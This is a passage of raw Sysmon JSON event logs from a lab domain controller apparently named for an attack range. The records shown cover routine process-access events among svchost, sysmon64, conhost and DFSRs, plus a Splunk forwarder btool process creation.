C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1817,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1818,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1819,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1820,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1821,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1822,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-001067B60300}\r\nTargetProcessId: 3720\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-001067B60300}","TargetProcessId":"3720","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1823,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.405\r\nProcessGuid: {A837DB8D-01C7-5F25-0000-001041B70300}\r\nProcessId: 3748\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-01C7-5F25-0000-001067B60300}\r\nParentProcessId: 3720\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list kvstore --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.405","ProcessGuid":"{A837DB8D-01C7-5F25-0000-001041B70300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-01C7-5F25-0000-001067B60300}","ParentProcessId":"3720","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list kvstore --no-log","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1824,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nSourceProcessId: 2804\r\nSourceThreadId: 3296\r\nSourceImage: C:\\Windows\\system32\\DFSRs.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmidcprv.dll+163a4|C:\\Windows\\system32\\wbem\\wmidcprv.dll+166e0|C:\\Windows\\system32\\wbem\\wmidcprv.dll+abad|C:\\Windows\\system32\\wbem\\wmidcprv.dll+b57e|C:\\Windows\\system32\\wmidcom.dll+58a6|C:\\Windows\\system32\\wmidcom.dll+5464|C:\\Windows\\system32\\wmidcom.dll+5495|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","SourceProcessId":"2804","SourceThreadId":"3296","SourceImage":"C:\\Windows\\system32\\DFSRs.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmidcprv.dll+163a4|C:\\Windows\\system32\\wbem\\wmidcprv.dll+166e0|C:\\Windows\\system32\\wbem\\wmidcprv.dll+abad|C:\\Windows\\system32\\wbem\\wmidcprv.dll+b57e|C:\\Windows\\system32\\wmidcom.dll+58a6|C:\\Windows\\system32\\wmidcom.dll+5464|C:\\Windows\\system32\\wmidcom.dll+5495|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","E